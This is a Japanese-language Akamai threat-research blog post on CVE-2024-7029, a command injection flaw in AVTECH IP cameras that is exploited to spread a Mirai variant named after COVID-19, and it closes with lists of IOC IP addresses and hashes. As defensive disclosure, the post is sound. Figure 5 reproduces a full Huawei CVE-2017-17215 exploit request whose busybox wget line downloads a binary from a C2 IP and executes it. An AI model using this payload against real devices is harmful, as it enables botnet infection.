X
メインコンテンツにスキップ
Akamai
ログイン
ログイン Close
Cloud Manager
クラウドコンピューティングサービスを管理する
ログイン Close
Control Center
セキュリティおよび配信サービスを管理する

パッチ適用不可に注意：ゼロデイを介して拡散するCorona Miraiボットネット

Akamai Wave Blue

執筆者

Kyle Lefton, Larry Cashdollar, and Aline Eliovich

August 28, 2024

Kyle Lefton

執筆者

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

執筆者

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

執筆者

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

この脆弱性が悪用されると、攻撃者による標的システム上でのリモートコード実行に繋がります。
この脆弱性が悪用されると、攻撃者による標的システム上でのリモートコード実行に繋がります。

編集・協力：Tricia Howard
編集・修正：Maria Vlasak

エグゼクティブサマリー

  • Akamai Security Intelligence and Response Team（SIRT）は、過去に悪用された複数の脆弱性と、SIRTによって検出されたゼロデイ脆弱性を悪用するボットネットキャンペーンを観測しました。

  • CVE-2024-7029（Aline Eliovichによって発見）は、リモートコードの実行（RCE）を可能にするAVTECH閉回路テレビ（CCTV）カメラの明るさ機能に存在する、コマンドインジェクションの脆弱性です。

  • コマンドが注入されると、このボットネットは、少なくとも2020年以降に確認されたCOVID-19ウイルスを参照する文字列名をもつMiraiバリアントを拡散します。  

  • この脅威に対する防御を支援するために、このブログ記事に、脅威の痕跡（IOC）のリストを掲載しました。 

概念実証（PoC）にジャンプする

はじめに

Akamai SIRTは、社内外のさまざまなインテリジェンスフィードを監視し、また、それに参加することで、当社と顧客のオンラインライフの安全を守ります。Akamaiのグローバルなハニーポットネットワークを通じて、いくつかのアクティブな脅威を発見しました。そのうちの1つが、CVE-2024-7029Aline Eliovichによって発見）です。

このRCEゼロデイ脆弱性は、AVTECHのIPカメラデバイスの明るさ機能で発見されたもので、コマンドインジェクションを可能にし、標的のシステム上にMiraiバリアントを拡散させることができます。これは、昇格した特権（実行中のプロセスオーナー）を使用し、リモートで実行できます。2024年8月、CISAはこの脆弱性について、攻撃の複雑性、リモートエクスプロイト、および既知のパブリックエクスプロイトがないことを理由として、産業用制御システム（ICS）勧告を発行しました。 

ボットネットキャンペーンは、CVE-2024-7029以外の複数の脆弱性を標的としており、これには複数のAVTECH脆弱性、Hadoop YARN RCECVE-2014-8361CVE-2017-17215が含まれます。これは、悪性の目的を達成するために、古く、優先度が低そうな、パッチが適用されていない脆弱性を利用するという、攻撃者の厄介な傾向に続くものです。

今こそキャッチアップ&パッチアップのとき

パッチアップ（パッチの適用）&キャッチアップ（後れを取り戻す）のタイミングは今です。これらの脆弱性の多くには、RCE要素があります。さらに悪いことに、正式なCVE割り当てがないため、バグを追跡することはおろか、パッチを適用することも難しくなっています。

このブログ記事では、ゼロデイ攻撃とその影響について説明し、検知や緩和を容易にするためのIOCの包括的なリストを紹介します。

CVE-2024-7029とは？

簡潔に言えば、CVE-2024-7029は、AVTECHのIPカメラデバイスにおいて、「brightness」引数が「action=」パラメーターに存在し、それがコマンドインジェクションを可能にする脆弱性です。この脆弱性は攻撃者によって悪用され、COVID-19ウイルスの名を冠した文字列名を持つMiraiバリアントが拡散されたことが分かりました。

この脆弱性はいつから悪用されているのか

最初に観測された悪用行為は、2024年3月18日に始まりましたが、分析によると、バリアントの拡散は2023年12月には行われていました。CVE-2024-7029の概念実証（PoC）は少なくとも2019年から一般公開されていましたが、2024年8月まで適切なCVEが割り当てられることはありませんでした。

誰が影響を受けるのか

AVTECHのIPカメラデバイスにおけるこの脆弱性は、AVM1203のファームウェアバージョンFullImg-1023-1007-1011-1009までに影響を及ぼします。問題のモデルは数年前に製造中止になっているにもかかわらず、CISAは勧告の中で、これらのデバイスは交通局やその他の重要なインフラエンティティを含め、依然として世界中で使用されていると述べています。

どのような仕組みか

この脆弱性はもともと、ハニーポットログを調べている際に発見されました。図1に、わかりやすくするためにデコードされたURLを示します。

デコードされたペイロード 図1：エクスプロイト試行のデコードされたペイロード本文

この脆弱性は、/cgi-bin/supervisor/Factory.cgiファイル内の明るさ機能に存在します（図2）。

この脆弱性は、明るさ機能に存在します 図2：エクスプロイトのPoC

何が起こり得るのか？

観測された悪用例では、基本的に、この脆弱性が悪用されると、攻撃者による標的システム上でのリモートコード実行に繋がるということが起きていました。

図3は、この脆弱性を悪用することでJavaScriptファイルをダウンロードして実行し、メインのマルウェアペイロードをフェッチしてロードする脅威アクターの例です。他の多くのボットネットと同様に、このボットネットも標的に対してMiraiマルウェアのバリアントを拡散しています。

図3は、この脆弱性を悪用することでJavaScriptファイルをダウンロードして実行し、メインのマルウェアペイロードをフェッチしてロードする攻撃者の例です。 図3：JavaScriptダウンローダーからの文字列

この例では、ボットネットはCorona Miraiバリアントを使用している可能性が高く、このバリアントはCOVID-19ウイルスとの関連で2020年の時点で他のベンダーによって参照されています。 

実行すると、マルウェアはポート23、2323、37215のTelnetを介して多数のホストに接続します。また、感染したホストのコンソールに「Corona」という文字列を出力します（図4）。

また、感染したホストのコンソールに「Corona」という文字列を出力します（図4）。
また、感染したホストのコンソールに「Corona」という文字列を出力します（図4）。 図4：コンソールへの出力を示すマルウェアの実行

マルウェアサンプルにある文字列を静的解析すると、CVE-2017-17215の影響を受けるHuaweiのデバイスを悪用しようとして、/ctrlt/DeviceUpgrade_1というパスを標的にしていることが分かります。このサンプルには、2つのハードコードされたコマンド&コントロール（C2）IPアドレスがあり、そのうちの1つはCVE-2017-17215エクスプロイトコードの一部です（図5）。 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

図5：CVE-2017-17215 /ctrlt/DeviceUpgrade_1エクスプロイトコード

このボットネットは、Hadoop YARN RCE、CVE-2014-8361、CVE-2017-17215など、他のいくつかの脆弱性も標的にしていました。これらの脆弱性が何度も野放しで悪用されていることが観測されており、現在も悪用され続けています。

結論

正式なCVE割り当てのない脆弱性であっても、組織にとって重大な脅威となる可能性があります。これらのボットネットを運用する攻撃者は、新たな脆弱性や見過ごされている脆弱性を悪用してマルウェアを拡散しています。CVE-2024-7029も見過ごされている脆弱性の一例であり、SIRTが観測している攻撃傾向の中でもますます一般的になりつつあります。

パブリックエクスプロイトや利用可能なPoCが存在しながら正式なCVEが割り当てられていない脆弱性も多く、デバイスにパッチが適用されていないケースもあります。パッチの優先順位を管理することは、特に脅威が利用可能なパッチを持たない場合、困難です。脅威を修復する方法がない場合は、ハードウェアとソフトウェアを廃棄することが、セキュリティリスクを緩和し、規制違反による罰金のリスクを低減するために推奨される方法です。

最新情報をご確認ください

Akamai SIRTは、顧客、社員、そしてセキュリティコミュニティ全体の安全のために、CVE-2024-7029のような脅威の検出、監視、報告を続けていきます。最新の調査結果を把握するには、ソーシャルメディアでフォローするか、当社のセキュリティリサーチのページをご覧ください。

IOC

IPv4アドレス

93.123.39[.]72

93.123.39[.]87

93.123.39[.]111

147.78.103[.]177

185.216.70[.]37

94.156.8[.]185

93.123.39[.]173

74.50.81[.]158

94.156.71[.]74

93.123.85[.]213

185.216.70[.]142

45.66.231[.]148

185.216.70[.]79

SHA256ハッシュ

15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (“r”)

c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 (“x86”)

b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af  (“sh”)

e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57  (“mips”)

9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656  (“r”)

f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3  (“mips”)

22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab  (“sh”)

135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2  (“r”)

6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82  (“r”)

947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212  (“r”)

8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 (“r”)

5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1  (“r”)

372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92  (“r”)

3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280  (“sh”)

40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2  (“r”)

4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff  (“x86”)

25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91  (“r”)

cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c  (“x86”)

774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b  (“x86”)

06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499  (“r”)

4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1  (“sh”)

c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c  (“x86”)

0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 (“x86”)

2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582  (“x86”)

5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d (“x86”)
その他のリサーチを見る
その他のリサーチを見る
Akamai Wave Blue

執筆者

Kyle Lefton, Larry Cashdollar, and Aline Eliovich

August 28, 2024

Kyle Lefton

執筆者

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

執筆者

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

執筆者

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

関連ブログ記事

これらの調査結果は、複数の収益化手法や攻撃手法を同時に展開できる、活発なエコシステムの存在を示唆しています。
これらの調査結果は、複数の収益化手法や攻撃手法を同時に展開できる、活発なエコシステムの存在を示唆しています。
リサーチ

生産性向上のための拡張機能が攻撃基盤になるとき

September 30, 2026
Akamaiの調査により、リモート設定を利用して9,800人以上のユーザーを監視し、閲覧活動を乗っ取る、32種類の悪性ブラウザー拡張機能によるキャンペーンが明らかになりました。
by Natalie Zagarov
続きを読む
重要な脅威インテリジェンスを共有することで、セキュリティコミュニティ全体が新たな脅威をいち早く察知し、先手を打って対処できるようになります。
重要な脅威インテリジェンスを共有することで、セキュリティコミュニティ全体が新たな脅威をいち早く察知し、先手を打って対処できるようになります。
リサーチ

Akamai、Athena Coalitionに参加し、新たに発見された脆弱性からユーザーを保護

September 28, 2026
Akamaiは、ChainguardのAthena Coalitionに参加しました。これにより、Akamai App & API Protectorの顧客は、新たに公表された脆弱性から自動的に保護されます。
by Akamai Security Intelligence Group
続きを読む
ASEのCMD Injection保護機能は、GraphQLのヘッダーおよびパラメーターを介した主要な攻撃ベクトルを標準機能としてすでにブロックしています。
ASEのCMD Injection保護機能は、GraphQLのヘッダーおよびパラメーターを介した主要な攻撃ベクトルを標準機能としてすでにブロックしています。
セキュリティリサーチ

CVE-2026-75650：StyleSmuggler—Adobe CommerceおよびMagentoにおける重大なRCE脆弱性

September 14, 2026
Adobe CommerceおよびMagentoにおけるRCE脆弱性、CVE-2026-75650（StyleSmuggler）について解説します。Akamai Adaptive Security EngineのCMD Injection保護機能は、主要な攻撃ベクトルをブロックします。
by Akamai Security Intelligence Group
続きを読む